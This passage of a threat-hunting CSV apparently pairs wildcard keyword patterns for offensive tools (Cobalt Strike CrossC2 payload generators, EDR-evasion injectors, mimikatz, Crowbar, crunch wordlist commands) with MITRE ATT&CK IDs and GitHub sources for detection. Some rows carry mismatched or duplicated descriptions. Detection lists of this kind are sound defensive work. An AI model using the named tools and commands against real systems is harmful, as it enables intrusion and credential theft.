TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2_dev_*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*crossc2_entry*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*crossc2_portscan.*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*crossc2_serverscan.*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*CrossC2Beacon*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2-cs*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2-GithubBot*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2Kit,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2Kit.*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*CrossC2Kit.*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*CrossC2Kit.git*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*CrossC2Kit_demo*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*crossc2kit_latest*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2Kit_Loader*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*CrossC2Listener*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossC2MemScriptEng*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*CrossC2Script*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*CrossLinked*,offensive_tool_keyword,CrossLinked,CrossLinked simplifies the processes of searching LinkedIn to collect valid employee names when performing password spraying or other security testing against an organization. Using similar search engine scraping capabilities found in tools like subscraper and pymeta,T1596 - T1593 - T1591 - T1589 - T1556 - T1213,TA0043 - TA0010 - TA0009,N/A,N/A,Information Gathering,https://github.com/m8r0wn/CrossLinked,1,0,N/A,N/A,10,915,155,2023-10-03T13:00:54Z,2019-05-16T13:36:36Z -*CrossNet.exe*,offensive_tool_keyword,cobaltstrike,Cobaltstrike payload generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dr0op/CrossNet-Beta,1,1,N/A,10,10,352,56,2022-07-18T06:23:16Z,2021-02-08T10:52:39Z -*Cross-Site-Scripting-XSS-Payloads*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*CrossTenantSynchronizationBackdoor.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*crowbar*,offensive_tool_keyword,Crowbar,Crowbar (formally known as Levye) is a brute forcing tool that can be used during penetration tests. It was developed to brute force some protocols in a different manner according to other popular brute forcing tools. As an example. while most brute forcing tools use username and password for SSH brute force. Crowbar uses SSH key(s). This allows for any private keys that have been obtained during penetration tests. to be used to attack other SSH servers.,T1110 - T1114 - T1189 - T1051 - T1552,TA0002 - TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/galkan/crowbar,1,0,N/A,N/A,10,1231,324,2022-12-28T16:10:59Z,2014-09-30T07:46:23Z -*CroweCybersecurity/ad-ldap-enum*,offensive_tool_keyword,ad-ldap-enum,An LDAP based Active Directory user and group enumeration tool,T1087 - T1087.001 - T1018 - T1069 - T1069.002,TA0007 - TA0003 - TA0004,N/A,N/A,AD Enumeration,https://github.com/CroweCybersecurity/ad-ldap-enum,1,1,N/A,6,3,290,72,2023-02-10T19:07:34Z,2015-08-25T19:38:39Z -*CRTInjectAsSystem*,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,1,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*CRTInjectElevated*,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,1,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*CRTInjectWithoutPid*,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,1,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*crunch * -o *.txt*,offensive_tool_keyword,crunch,Generate a dictionary file containing words with a minimum and maximum length,T1596 - T1596.001,TA0043,N/A,N/A,Credential Access,https://sourceforge.net/projects/crunch-wordlist/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*crunch 4 7 abcdefghijklmnopqrstuvwxyz1234567890 -o wordlist.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*crypt0p3g/bof-collection*,offensive_tool_keyword,bof-collection,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/crypt0p3g/bof-collection,1,1,N/A,N/A,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*crypto::capi*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 